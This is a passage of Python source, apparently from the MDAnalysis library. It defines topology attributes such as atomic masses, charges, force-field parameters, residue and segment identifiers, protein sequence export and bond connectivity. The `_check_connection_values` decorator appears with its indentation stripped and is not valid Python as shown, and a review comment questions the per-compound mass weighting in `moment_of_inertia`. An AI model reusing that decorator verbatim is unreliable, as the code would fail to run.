    # Per-atom masses; residue/segment masses are derived by summing the
    # member atoms (see get_residues/get_segments below).
    attrname = 'masses'
    singular = 'mass'
    per_object = 'atom'
    target_classes = [AtomGroup, ResidueGroup, SegmentGroup,
                      Atom, Residue, Segment]
    # Registry of methods attached to other core classes at import time.
    transplants = defaultdict(list)
    dtype = np.float64

    groupdoc = """Mass of each component in the Group.

    If the Group is an AtomGroup, then the masses are for each atom. If the
    Group is a ResidueGroup or SegmentGroup, the masses are for each residue or
    segment, respectively. These are obtained by summation of the member atoms
    for each component.
    """

    singledoc = """Mass of the component."""

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # Default mass is 0.0 for every atom.
        return np.zeros(na)

    def get_residues(self, rg):
        """Sum of member-atom masses for the residue(s) in ``rg``."""
        resatoms = self.top.tt.residues2atoms_2d(rg.ix)

        if isinstance(rg._ix, numbers.Integral):
            # for a single residue: scalar sum over its atoms
            masses = self.values[tuple(resatoms)].sum()
        else:
            # for a residuegroup: one summed mass per residue
            masses = np.empty(len(rg))
            for i, row in enumerate(resatoms):
                masses[i] = self.values[row].sum()

        return masses

    def get_segments(self, sg):
        """Sum of member-atom masses for the segment(s) in ``sg``."""
        segatoms = self.top.tt.segments2atoms_2d(sg.ix)

        if isinstance(sg._ix, numbers.Integral):
            # for a single segment: scalar sum over its atoms
            masses = self.values[tuple(segatoms)].sum()
        else:
            # for a segmentgroup: one summed mass per segment
            masses = np.array([self.values[row].sum() for row in segatoms])

        return masses

    @warn_if_not_unique
    @_pbc_to_wrap
    @check_wrap_and_unwrap
    def center_of_mass(group, wrap=False, unwrap=False, compound='group'):
        """Center of mass of (compounds of) the group.

        Computes the center of mass of :class:`Atoms<Atom>` in the group.
        Centers of mass per :class:`Residue`, :class:`Segment`, molecule, or
        fragment can be obtained by setting the `compound` parameter
        accordingly. If the masses of a compound sum up to zero, the
        center of mass coordinates of that compound will be ``nan`` (not a
        number).

        Parameters
        ----------
        wrap : bool, optional
            If ``True`` and `compound` is ``'group'``, move all atoms to the
            primary unit cell before calculation.
            If ``True`` and `compound` is not ``group``, the
            centers of mass of each compound will be calculated without moving
            any atoms to keep the compounds intact. Instead, the resulting
            center-of-mass position vectors will be moved to the primary unit
            cell after calculation.
        unwrap : bool, optional
            If ``True``, compounds will be unwrapped before computing their
            centers.
        compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
                   optional
            If ``'group'``, the center of mass of all atoms in the group will
            be returned as a single position vector. Otherwise, the centers of
            mass of each :class:`Segment`, :class:`Residue`, molecule, or
            fragment will be returned as an array of position vectors, i.e. a 2d
            array.
            Note that, in any case, *only* the positions of :class:`Atoms<Atom>`
            *belonging to the group* will be taken into account.

        Returns
        -------
        center : numpy.ndarray
            Position vector(s) of the center(s) of mass of the group.
            If `compound` was set to ``'group'``, the output will be a single
            position vector.
            If `compound` was set to ``'segments'`` or ``'residues'``, the
            output will be a 2d coordinate array of shape ``(n, 3)`` where ``n``
            is the number of compounds.

        Note
        ----
        This method can only be accessed if the underlying topology has
        information about atomic masses.

        .. versionchanged:: 0.8
           Added `pbc` parameter
        .. versionchanged:: 0.19.0
           Added `compound` parameter
        .. versionchanged:: 0.20.0
           Added ``'molecules'`` and ``'fragments'`` compounds;
           added `unwrap` parameter
        .. versionchanged:: 2.1.0
           Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
           is deprecated and will be removed in version 3.0.
        """
        atoms = group.atoms
        # Delegate to the generic weighted center with masses as weights.
        return atoms.center(weights=atoms.masses, wrap=wrap, compound=compound,
                            unwrap=unwrap)

    transplants[GroupBase].append(
        ('center_of_mass', center_of_mass))

    @warn_if_not_unique
    def total_mass(group, compound='group'):
        r"""Total mass of (compounds of) the group.

        Computes the total mass of :class:`Atoms<Atom>` in the group.
        Total masses per :class:`Residue`, :class:`Segment`, molecule, or
        fragment can be obtained by setting the `compound` parameter
        accordingly.

        Parameters
        ----------
        compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
                   optional
            If ``'group'``, the total mass of all atoms in the group will be
            returned as a single value. Otherwise, the total masses per
            :class:`Segment`, :class:`Residue`, molecule, or fragment will be
            returned as a 1d array.
            Note that, in any case, *only* the masses of :class:`Atoms<Atom>`
            *belonging to the group* will be taken into account.

        Returns
        -------
        float or numpy.ndarray
            Total mass of (compounds of) the group.
            If `compound` was set to ``'group'``, the output will be a single
            value. Otherwise, the output will be a 1d array of shape ``(n,)``
            where ``n`` is the number of compounds.


        .. versionchanged:: 0.20.0 Added `compound` parameter
        """
        return group.accumulate("masses", compound=compound)

    transplants[GroupBase].append(
        ('total_mass', total_mass))

    @warn_if_not_unique
    @_pbc_to_wrap
    @check_wrap_and_unwrap
    def moment_of_inertia(group, wrap=False, unwrap=False, compound="group"):
        r"""Moment of inertia tensor relative to center of mass.

        Parameters
        ----------
        wrap : bool, optional
            If ``True`` and `compound` is ``'group'``, move all atoms to the
            primary unit cell before calculation.
            If ``True`` and `compound` is not ``group``, the
            centers of mass of each compound will be calculated without moving
            any atoms to keep the compounds intact. Instead, the resulting
            center-of-mass position vectors will be moved to the primary unit
            cell after calculation.
        unwrap : bool, optional
            If ``True``, compounds will be unwrapped before computing their
            centers and tensor of inertia.
        compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
                   optional
            `compound` determines the behavior of `wrap`.
            Note that, in any case, *only* the positions of :class:`Atoms<Atom>`
            *belonging to the group* will be taken into account.

        Returns
        -------
        moment_of_inertia : numpy.ndarray
            Moment of inertia tensor as a 3 x 3 numpy array.

        Notes
        -----
        The moment of inertia tensor :math:`\mathsf{I}` is calculated for a group of
        :math:`N` atoms with coordinates :math:`\mathbf{r}_i,\ 1 \le i \le N`
        relative to its center of mass from the relative coordinates

        .. math::
           \mathbf{r}'_i = \mathbf{r}_i - \frac{1}{\sum_{i=1}^{N} m_i} \sum_{i=1}^{N} m_i \mathbf{r}_i

        as

        .. math::
           \mathsf{I} = \sum_{i=1}^{N} m_i \Big[(\mathbf{r}'_i\cdot\mathbf{r}'_i) \sum_{\alpha=1}^{3}
           \hat{\mathbf{e}}_\alpha \otimes \hat{\mathbf{e}}_\alpha - \mathbf{r}'_i \otimes \mathbf{r}'_i\Big]

        where :math:`\hat{\mathbf{e}}_\alpha` are Cartesian unit vectors, or in Cartesian coordinates

        .. math::
           I_{\alpha,\beta} = \sum_{k=1}^{N} m_k
           \Big(\big(\sum_{\gamma=1}^3 (x'^{(k)}_{\gamma})^2 \big)\delta_{\alpha,\beta}
           - x'^{(k)}_{\alpha} x'^{(k)}_{\beta} \Big).

        where :math:`x'^{(k)}_{\alpha}` are the Cartesian coordinates of the
        relative coordinates :math:`\mathbf{r}'_k`.


        .. versionchanged:: 0.8
           Added `pbc` keyword
        .. versionchanged:: 0.20.0
           Added `unwrap` parameter
        .. versionchanged:: 2.1.0
           Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
           is deprecated and will be removed in version 3.0.
        """
        atomgroup = group.atoms
        com = atomgroup.center_of_mass(
            wrap=wrap, unwrap=unwrap, compound=compound)
        if compound != 'group':
            # Collapse the per-compound centers into one overall COM by
            # weighting with ``group.masses``.
            # NOTE(review): assumes ``group.masses`` aligns one-to-one with
            # the per-compound centers returned above -- TODO confirm for
            # groups where compound != 'group'.
            com = (com * group.masses[:, None]
                   ).sum(axis=0) / group.masses.sum()

        if wrap:
            pos = atomgroup.pack_into_box(inplace=False) - com
        elif unwrap:
            pos = atomgroup.unwrap(compound=compound, inplace=False) - com
        else:
            pos = atomgroup.positions - com

        masses = atomgroup.masses
        # Create the inertia tensor
        # m_i = mass of atom i
        # (x_i, y_i, z_i) = pos of atom i
        # Ixx = sum(m_i*(y_i^2+z_i^2));
        # Iyy = sum(m_i*(x_i^2+z_i^2));
        # Izz = sum(m_i*(x_i^2+y_i^2))
        # Ixy = Iyx = -1*sum(m_i*x_i*y_i)
        # Ixz = Izx = -1*sum(m_i*x_i*z_i)
        # Iyz = Izy = -1*sum(m_i*y_i*z_i)
        tens = np.zeros((3, 3), dtype=np.float64)
        # xx
        tens[0][0] = (masses * (pos[:, 1] ** 2 + pos[:, 2] ** 2)).sum()
        # xy & yx
        tens[0][1] = tens[1][0] = - (masses * pos[:, 0] * pos[:, 1]).sum()
        # xz & zx
        tens[0][2] = tens[2][0] = - (masses * pos[:, 0] * pos[:, 2]).sum()
        # yy
        tens[1][1] = (masses * (pos[:, 0] ** 2 + pos[:, 2] ** 2)).sum()
        # yz + zy
        tens[1][2] = tens[2][1] = - (masses * pos[:, 1] * pos[:, 2]).sum()
        # zz
        tens[2][2] = (masses * (pos[:, 0] ** 2 + pos[:, 1] ** 2)).sum()
        return tens

    transplants[GroupBase].append(
        ('moment_of_inertia', moment_of_inertia))

    @warn_if_not_unique
    @_pbc_to_wrap
    def radius_of_gyration(group, wrap=False, **kwargs):
        """Radius of gyration.

        Parameters
        ----------
        wrap : bool, optional
            If ``True``, move all atoms within the primary unit cell before
            calculation. [``False``]


        .. versionchanged:: 0.8
           Added `pbc` keyword
        .. versionchanged:: 2.1.0
           Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
           is deprecated and will be removed in version 3.0.
        """
        atomgroup = group.atoms
        masses = atomgroup.masses

        com = atomgroup.center_of_mass(wrap=wrap)
        if wrap:
            recenteredpos = atomgroup.pack_into_box(inplace=False) - com
        else:
            recenteredpos = atomgroup.positions - com

        # mass-weighted mean-square distance from the center of mass
        rog_sq = np.sum(masses * np.sum(recenteredpos**2,
                                        axis=1)) / atomgroup.total_mass()

        return np.sqrt(rog_sq)

    transplants[GroupBase].append(
        ('radius_of_gyration', radius_of_gyration))

    @warn_if_not_unique
    @_pbc_to_wrap
    def shape_parameter(group, wrap=False):
        """Shape parameter.

        See [Dima2004a]_ for background information.

        Parameters
        ----------
        wrap : bool, optional
            If ``True``, move all atoms within the primary unit cell before
            calculation. [``False``]


        .. versionadded:: 0.7.7
        .. versionchanged:: 0.8
           Added `pbc` keyword
        .. versionchanged:: 2.1.0
           Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
           is deprecated and will be removed in version 3.0.
           Superfluous kwargs were removed.
        """
        atomgroup = group.atoms
        masses = atomgroup.masses

        com = atomgroup.center_of_mass(wrap=wrap)
        if wrap:
            recenteredpos = atomgroup.pack_into_box(inplace=False) - com
        else:
            recenteredpos = atomgroup.positions - com
        # mass-weighted gyration tensor
        tensor = np.zeros((3, 3))

        for x in range(recenteredpos.shape[0]):
            tensor += masses[x] * np.outer(recenteredpos[x, :],
                                           recenteredpos[x, :])
        tensor /= atomgroup.total_mass()
        eig_vals = np.linalg.eigvalsh(tensor)
        # S = 27 * prod(lambda_i - mean) / (sum lambda_i)^3
        shape = 27.0 * np.prod(eig_vals - np.mean(eig_vals)
                               ) / np.power(np.sum(eig_vals), 3)

        return shape

    transplants[GroupBase].append(
        ('shape_parameter', shape_parameter))

    @warn_if_not_unique
    @_pbc_to_wrap
    @check_wrap_and_unwrap
    def asphericity(group, wrap=False, unwrap=None, compound='group'):
        """Asphericity.

        See [Dima2004b]_ for background information.

        Parameters
        ----------
        wrap : bool, optional
            If ``True``, move all atoms within the primary unit cell before
            calculation. [``False``]
        unwrap : bool, optional
            If ``True``, compounds will be unwrapped before computing their
            centers.
        compound : {'group', 'segments', 'residues', 'molecules', 'fragments'}, optional
            Which type of component to keep together during unwrapping.


        .. versionadded:: 0.7.7
        .. versionchanged:: 0.8
           Added `pbc` keyword
        .. versionchanged:: 0.20.0
           Added *unwrap* and *compound* parameter
        .. versionchanged:: 2.1.0
           Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
           is deprecated and will be removed in version 3.0.
        """
        atomgroup = group.atoms
        masses = atomgroup.masses

        com = atomgroup.center_of_mass(
            wrap=wrap, unwrap=unwrap, compound=compound)
        if compound != 'group':
            # Collapse per-compound centers into one overall COM
            # (mass-weighted); see NOTE in moment_of_inertia.
            com = (com * group.masses[:, None]
                   ).sum(axis=0) / group.masses.sum()

        if wrap:
            recenteredpos = (atomgroup.pack_into_box(inplace=False) - com)
        elif unwrap:
            recenteredpos = (atomgroup.unwrap(inplace=False) - com)
        else:
            recenteredpos = (atomgroup.positions - com)

        # mass-weighted gyration tensor
        tensor = np.zeros((3, 3))
        for x in range(recenteredpos.shape[0]):
            tensor += masses[x] * np.outer(recenteredpos[x],
                                           recenteredpos[x])

        tensor /= atomgroup.total_mass()
        eig_vals = np.linalg.eigvalsh(tensor)
        # Delta = (3/2) * sum((lambda_i - mean)^2) / (sum lambda_i)^2
        shape = (3.0 / 2.0) * (np.sum((eig_vals - np.mean(eig_vals))**2) /
                               np.sum(eig_vals)**2)

        return shape

    transplants[GroupBase].append(
        ('asphericity', asphericity))

    @warn_if_not_unique
    @_pbc_to_wrap
    def principal_axes(group, wrap=False):
        """Calculate the principal axes from the moment of inertia.

        e1,e2,e3 = AtomGroup.principal_axes()

        The eigenvectors are sorted by eigenvalue, i.e. the first one
        corresponds to the highest eigenvalue and is thus the first principal
        axes.

        The eigenvectors form a right-handed coordinate system.

        Parameters
        ----------
        wrap : bool, optional
            If ``True``, move all atoms within the primary unit cell before
            calculation. [``False``]

        Returns
        -------
        axis_vectors : array
            3 x 3 array with ``v[0]`` as first, ``v[1]`` as second, and
            ``v[2]`` as third eigenvector.


        .. versionchanged:: 0.8
           Added `pbc` keyword
        .. versionchanged:: 1.0.0
           Always return principal axes in right-hand convention.
        .. versionchanged:: 2.1.0
           Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
           is deprecated and will be removed in version 3.0.
        """
        atomgroup = group.atoms
        # NOTE(review): the inertia tensor is symmetric, so np.linalg.eigh
        # would also apply; behavior kept as-is with np.linalg.eig.
        e_val, e_vec = np.linalg.eig(atomgroup.moment_of_inertia(wrap=wrap))

        # Sort (descending eigenvalue)
        indices = np.argsort(e_val)[::-1]
        # Make transposed in more logical form. See Issue 33.
        e_vec = e_vec[:, indices].T

        # Make sure the right hand convention is followed
        if np.dot(np.cross(e_vec[0], e_vec[1]), e_vec[2]) < 0:
            e_vec *= -1

        return e_vec

    transplants[GroupBase].append(
        ('principal_axes', principal_axes))

    def align_principal_axis(group, axis, vector):
        """Align principal axis with index `axis` with `vector`.

        Parameters
        ----------
        axis : {0, 1, 2}
            Index of the principal axis (0, 1, or 2), as produced by
            :meth:`~principal_axes`.
        vector : array_like
            Vector to align principal axis with.

        Notes
        -----
        To align the long axis of a channel (the first principal axis, i.e.
        *axis* = 0) with the z-axis::

          u.atoms.align_principal_axis(0, [0,0,1])
          u.atoms.write("aligned.pdb")
        """
        p = group.principal_axes()[axis]
        # rotation angle (degrees) between chosen axis and target vector
        angle = np.degrees(mdamath.angle(p, vector))
        # rotation axis perpendicular to both
        ax = transformations.rotaxis(p, vector)
        # print "principal[%d] = %r" % (axis, p)
        # print "axis = %r, angle = %f deg" % (ax, angle)
        return group.rotateby(angle, ax)

    transplants[GroupBase].append(
        ('align_principal_axis', align_principal_axis))
# TODO: update docs to property doc
class Charges(AtomAttr):
    # Per-atom partial charges; residue/segment charges are derived by
    # summing the member atoms (see get_residues/get_segments below).
    attrname = 'charges'
    singular = 'charge'
    per_object = 'atom'
    target_classes = [AtomGroup, ResidueGroup, SegmentGroup,
                      Atom, Residue, Segment]
    # Registry of methods attached to other core classes at import time.
    transplants = defaultdict(list)
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # Default charge is 0.0 for every atom.
        return np.zeros(na)

    def get_residues(self, rg):
        # Map residues to their member-atom indices, then sum atom charges.
        resatoms = self.top.tt.residues2atoms_2d(rg.ix)

        if isinstance(rg._ix, numbers.Integral):
            # single residue: scalar sum over its atoms
            charges = self.values[tuple(resatoms)].sum()
        else:
            # residue group: one summed charge per residue
            charges = np.empty(len(rg))
            for i, row in enumerate(resatoms):
                charges[i] = self.values[row].sum()

        return charges

    def get_segments(self, sg):
        segatoms = self.top.tt.segments2atoms_2d(sg.ix)

        if isinstance(sg._ix, numbers.Integral):
            # for a single segment
            charges = self.values[tuple(segatoms)].sum()
        else:
            # for a segmentgroup
            charges = np.array([self.values[row].sum() for row in segatoms])

        return charges

    @warn_if_not_unique
    def total_charge(group, compound='group'):
        r"""Total charge of (compounds of) the group.

        Computes the total charge of :class:`Atoms<Atom>` in the group.
        Total charges per :class:`Residue`, :class:`Segment`, molecule, or
        fragment can be obtained by setting the `compound` parameter
        accordingly.

        Parameters
        ----------
        compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
                   optional
            If 'group', the total charge of all atoms in the group will
            be returned as a single value. Otherwise, the total charges per
            :class:`Segment`, :class:`Residue`, molecule, or fragment
            will be returned as a 1d array.
            Note that, in any case, *only* the charges of :class:`Atoms<Atom>`
            *belonging to the group* will be taken into account.

        Returns
        -------
        float or numpy.ndarray
            Total charge of (compounds of) the group.
            If `compound` was set to ``'group'``, the output will be a single
            value. Otherwise, the output will be a 1d array of shape ``(n,)``
            where ``n`` is the number of compounds.


        .. versionchanged:: 0.20.0 Added `compound` parameter
        """
        return group.accumulate("charges", compound=compound)

    transplants[GroupBase].append(
        ('total_charge', total_charge))
# TODO: update docs to property doc
class Occupancies(AtomAttr):
    """Occupancy value for each atom; defaults to 0.0."""
    attrname = "occupancies"
    singular = "occupancy"
    per_object = "atom"
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0.0)
# TODO: update docs to property doc
class AltLocs(AtomStringAttr):
    """AltLoc for each atom; defaults to the empty string."""
    attrname = "altLocs"
    singular = "altLoc"
    per_object = "atom"
    dtype = object

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, "", dtype=object)
class GBScreens(AtomAttr):
    """Generalized Born screening factor; defaults to 0.0."""
    attrname = "gbscreens"
    singular = "gbscreen"
    per_object = "atom"
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0.0)
class SolventRadii(AtomAttr):
    """Intrinsic solvation radius; defaults to 0.0."""
    attrname = "solventradii"
    singular = "solventradius"
    per_object = "atom"
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0.0)
class NonbondedIndices(AtomAttr):
    """Nonbonded index (AMBER); stored as 32-bit integers, defaults to 0."""
    attrname = "nbindices"
    singular = "nbindex"
    per_object = "atom"
    dtype = int

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0, dtype=np.int32)
class RMins(AtomAttr):
    """The Rmin/2 LJ parameter; defaults to 0.0."""
    attrname = "rmins"
    singular = "rmin"
    per_object = "atom"
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0.0)
class Epsilons(AtomAttr):
    """The epsilon LJ parameter; defaults to 0.0."""
    attrname = "epsilons"
    singular = "epsilon"
    per_object = "atom"
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0.0)
class RMin14s(AtomAttr):
    """The Rmin/2 LJ parameter for 1-4 interactions; defaults to 0.0."""
    attrname = "rmin14s"
    singular = "rmin14"
    per_object = "atom"
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0.0)
class Epsilon14s(AtomAttr):
    """The epsilon LJ parameter for 1-4 interactions; defaults to 0.0."""
    attrname = "epsilon14s"
    singular = "epsilon14"
    per_object = "atom"
    dtype = float

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, 0.0)
class Aromaticities(AtomAttr):
    """Aromaticity flag per atom; defaults to ``False``."""
    attrname = "aromaticities"
    singular = "aromaticity"
    per_object = "atom"
    dtype = bool

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(na, False, dtype=bool)
class RSChirality(AtomAttr):
    """R/S chirality label per atom (single character)."""
    attrname = "chiralities"
    singular = "chirality"
    dtype = "U1"  # one-character unicode
class ResidueAttr(TopologyAttr):
    """Base class for per-residue topology attributes."""
    attrname = 'residueattrs'
    singular = 'residueattr'
    target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom, Residue]
    per_object = 'residue'

    def get_atoms(self, ag):
        """Look up the residue-level value for each atom in ``ag``."""
        residue_indices = self.top.tt.atoms2residues(ag.ix)
        return self.values[residue_indices]

    def set_atoms(self, ag, values):
        """Setting at atom level is not allowed for a residue attribute."""
        raise _wronglevel_error(self, ag)

    def get_residues(self, rg):
        """Return the stored values for the residues in ``rg``."""
        return self.values[rg.ix]

    @_check_length
    def set_residues(self, rg, values):
        """Assign ``values`` to the residues in ``rg``."""
        self.values[rg.ix] = values

    def get_segments(self, sg):
        """By default, the values for each residue present in the set of
        segments are returned in a single array. This behavior can be
        overridden in child attributes.
        """
        residue_index_rows = self.top.tt.segments2residues_2d(sg.ix)
        return [self.values[row] for row in residue_index_rows]

    def set_segments(self, sg, values):
        """Setting at segment level is not allowed for a residue attribute."""
        raise _wronglevel_error(self, sg)
# woe betide anyone who switches this inheritance order
# Mixin needs to be first (L to R) to get correct __init__ and set_atoms
class ResidueStringAttr(_StringInternerMixin, ResidueAttr):

    @_check_length
    def set_residues(self, ag, values):
        """Intern and assign string ``values`` for the residues in ``ag``."""
        return self._set_X(ag, values)

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # one empty string per residue
        return np.array([''] * nr, dtype=object)
# TODO: update docs to property doc
class Resids(ResidueAttr):
    """Residue ID"""
    attrname = "resids"
    singular = "resid"
    dtype = int

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # default resids are consecutive integers starting at 1
        return np.arange(nr) + 1
# TODO: update docs to property doc
class Resnames(ResidueStringAttr):
    """Residue name for each residue."""
    attrname = 'resnames'
    singular = 'resname'
    transplants = defaultdict(list)
    dtype = object

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # one empty string per residue
        return np.array(['' for _ in range(nr)], dtype=object)

    def sequence(self, **kwargs):
        """Returns the amino acid sequence.

        The format of the sequence is selected with the keyword *format*:

        ============== ============================================
        *format*       description
        ============== ============================================
        'SeqRecord'    :class:`Bio.SeqRecord.SeqRecord` (default)
        'Seq'          :class:`Bio.Seq.Seq`
        'string'       string
        ============== ============================================

        The sequence is returned by default (keyword ``format = 'SeqRecord'``)
        as a :class:`Bio.SeqRecord.SeqRecord` instance, which can then be
        further processed. In this case, all keyword arguments (such as the
        *id* string or the *name* or the *description*) are directly passed to
        :class:`Bio.SeqRecord.SeqRecord`.

        If the keyword *format* is set to ``'Seq'``, all *kwargs* are ignored
        and a :class:`Bio.Seq.Seq` instance is returned. The difference to the
        record is that the record also contains metadata and can be directly
        used as an input for other functions in :mod:`Bio`.

        If the keyword *format* is set to ``'string'``, all *kwargs* are
        ignored and a Python string is returned.

        .. rubric:: Example: Write FASTA file

        Use :func:`Bio.SeqIO.write`, which takes sequence records::

           import Bio.SeqIO

           # get the sequence record of a protein component of a Universe
           protein = u.select_atoms("protein")
           record = protein.sequence(id="myseq1", name="myprotein")
           Bio.SeqIO.write(record, "single.fasta", "fasta")

        A FASTA file with multiple entries can be written with ::

           Bio.SeqIO.write([record1, record2, ...], "multi.fasta", "fasta")

        Parameters
        ----------
        format : string, optional
           - ``"string"``: return sequence as a string of 1-letter codes
           - ``"Seq"``: return a :class:`Bio.Seq.Seq` instance
           - ``"SeqRecord"``: return a :class:`Bio.SeqRecord.SeqRecord`
             instance

           Default is ``"SeqRecord"``
        id : optional
           Sequence ID for SeqRecord (should be different for different
           sequences)
        name : optional
           Name of the protein.
        description : optional
           Short description of the sequence.
        kwargs : optional
           Any other keyword arguments that are understood by
           :class:`Bio.SeqRecord.SeqRecord`.

        Raises
        ------
        :exc:`ValueError` if a residue name cannot be converted to a
        1-letter IUPAC protein amino acid code; make sure to only
        select protein residues.

        :exc:`TypeError` if an unknown *format* is selected.

        .. versionadded:: 0.9.0
        """
        formats = ('string', 'Seq', 'SeqRecord')

        format = kwargs.pop("format", "SeqRecord")
        if format not in formats:
            raise TypeError("Unknown format='{0}': must be one of: {1}".format(
                format, ", ".join(formats)))
        try:
            sequence = "".join([convert_aa_code(r)
                                for r in self.residues.resnames])
        except KeyError as err:
            # BUGFIX: Python 3 exceptions have no ``.message`` attribute;
            # the offending residue name is the KeyError's first argument.
            errmsg = (f"AtomGroup contains a residue name '{err.args[0]}' that"
                      f" does not have a IUPAC protein 1-letter character")
            raise ValueError(errmsg) from None
        if format == "string":
            return sequence
        seq = Bio.Seq.Seq(sequence)
        if format == "Seq":
            return seq
        return Bio.SeqRecord.SeqRecord(seq, **kwargs)

    transplants[ResidueGroup].append(
        ('sequence', sequence))
# TODO: update docs to property doc
class Resnums(ResidueAttr):
    """Canonical residue number for each residue."""
    attrname = "resnums"
    singular = "resnum"
    dtype = int

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # default resnums are consecutive integers starting at 1
        return np.arange(nr) + 1
class ICodes(ResidueStringAttr):
    """Insertion code, stored per residue."""
    attrname = "icodes"
    singular = "icode"
    dtype = object
class Moltypes(ResidueStringAttr):
    """Name of the molecule type.

    Molecules sharing a molecule type share a common template topology.
    """
    attrname = "moltypes"
    singular = "moltype"
    dtype = object
class Molnums(ResidueAttr):
    """0-based index of the molecule, stored per residue."""
    attrname = "molnums"
    singular = "molnum"
    dtype = np.intp
# segment attributes
class SegmentAttr(TopologyAttr):
    """Base class for per-segment topology attributes."""
    attrname = 'segmentattrs'
    singular = 'segmentattr'
    target_classes = [AtomGroup, ResidueGroup,
                      SegmentGroup, Atom, Residue, Segment]
    per_object = 'segment'

    def get_atoms(self, ag):
        """Look up the segment-level value for each atom in ``ag``."""
        segment_indices = self.top.tt.atoms2segments(ag.ix)
        return self.values[segment_indices]

    def set_atoms(self, ag, values):
        """Setting at atom level is not allowed for a segment attribute."""
        raise _wronglevel_error(self, ag)

    def get_residues(self, rg):
        """Look up the segment-level value for each residue in ``rg``."""
        segment_indices = self.top.tt.residues2segments(rg.ix)
        return self.values[segment_indices]

    def set_residues(self, rg, values):
        """Setting at residue level is not allowed for a segment attribute."""
        raise _wronglevel_error(self, rg)

    def get_segments(self, sg):
        """Return the stored values for the segments in ``sg``."""
        return self.values[sg.ix]

    @_check_length
    def set_segments(self, sg, values):
        """Assign ``values`` to the segments in ``sg``."""
        self.values[sg.ix] = values
# woe betide anyone who switches this inheritance order
# Mixin needs to be first (L to R) to get correct __init__ and set_atoms
class SegmentStringAttr(_StringInternerMixin, SegmentAttr):

    @_check_length
    def set_segments(self, ag, values):
        """Intern and assign string ``values`` for the segments in ``ag``."""
        return self._set_X(ag, values)

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # one empty string per segment
        return np.array([''] * ns, dtype=object)
# TODO: update docs to property doc
class Segids(SegmentStringAttr):
    """Segment identifier for each segment."""
    attrname = "segids"
    singular = "segid"
    transplants = defaultdict(list)
    dtype = object

    @staticmethod
    def _gen_initial_values(na, nr, ns):
        return np.full(ns, "", dtype=object)
def _check_connection_values(func):
"""
Checks values passed to _Connection methods for:
- appropriate number of atom indices
- coerces them to tuples of ints (for hashing)
- ensures that first value is less than last (reversibility & hashing)
.. versionadded:: 1.0.0
"""
@functools.wraps(func)
def wrapper(self, values, *args, **kwargs):
if not all(len(x) == self._n_atoms
and all(isinstance(y, (int, np.integer)) for y in x)
for x in values):
raise ValueError(("{} must be an iterable of tuples with {}"
" atom indices").format(self.attrname,
self._n_atoms))
clean = []
for v in values:
if v[0] > v[-1]:
v = v[::-1]
clean.append(tuple(v))
return func(self, clean, *args, **kwargs)
return wrapper
class _ConnectionTopologyAttrMeta(_TopologyAttrMeta):
    """
    Specific metaclass for atom-connectivity topology attributes.

    This class adds an ``intra_{attrname}`` property to groups
    to return only the connections within the atoms in the group.
    """
    def __init__(cls, name, bases, classdict):
        super().__init__(name, bases, classdict)
        # Only concrete attribute classes define 'attrname'; the abstract
        # base (no attrname in its classdict) gets no property.
        attrname = classdict.get('attrname')

        if attrname is not None:
            def intra_connection(self, ag):
                """Get connections only within this AtomGroup
                """
                return ag.get_connections(attrname, outside=False)

            # Bind intra_connection to the attribute *class*; the property
            # getter is then called with the accessing group as ``ag``.
            method = MethodType(intra_connection, cls)
            prop = property(method, None, None, method.__doc__)
            cls.transplants[AtomGroup].append((f"intra_{attrname}", prop))
class _Connection(AtomAttr, metaclass=_ConnectionTopologyAttrMeta):
    """Base class for connectivity between atoms

    .. versionchanged:: 1.0.0
        Added type checking to atom index values.
    """

    @_check_connection_values
    def __init__(self, values, types=None, guessed=False, order=None):
        # ``values``: tuples of atom indices, validated and normalised by
        # the decorator. ``types``/``order``: optional per-connection
        # metadata; ``guessed``: whether each connection was guessed.
        self.values = values
        if types is None:
            types = [None] * len(values)
        self.types = types
        if guessed in (True, False):
            # if single value passed, multiply this across
            # all bonds
            guessed = [guessed] * len(values)
        self._guessed = guessed
        if order is None:
            order = [None] * len(values)
        self.order = order
        self._cache = dict()

    def copy(self):
        """Return a deepcopy of this attribute"""
        # Shallow per-list copies suffice: the entries themselves
        # (tuples / strings / None) are immutable.
        return self.__class__(copy.copy(self.values),
                              copy.copy(self.types),
                              copy.copy(self._guessed),
                              copy.copy(self.order))

    def __len__(self):
        # number of atoms that participate in at least one connection
        return len(self._bondDict)

    @property
    @cached('bd')
    def _bondDict(self):
        """Lazily built mapping of atoms:bonds"""
        bd = defaultdict(list)

        for b, t, g, o in zip(self.values, self.types,
                              self._guessed, self.order):
            # register the connection under every atom it involves
            for a in b:
                bd[a].append((b, t, g, o))
        return bd

    def set_atoms(self, ag):
        # BUGFIX: previously this *returned* a NotImplementedError instance,
        # so attempts to set bond information silently did nothing.
        raise NotImplementedError("Cannot set bond information")

    def get_atoms(self, ag):
        """
        Get connection values where the atom indices are in
        the given atomgroup.

        Parameters
        ----------
        ag : AtomGroup
        """
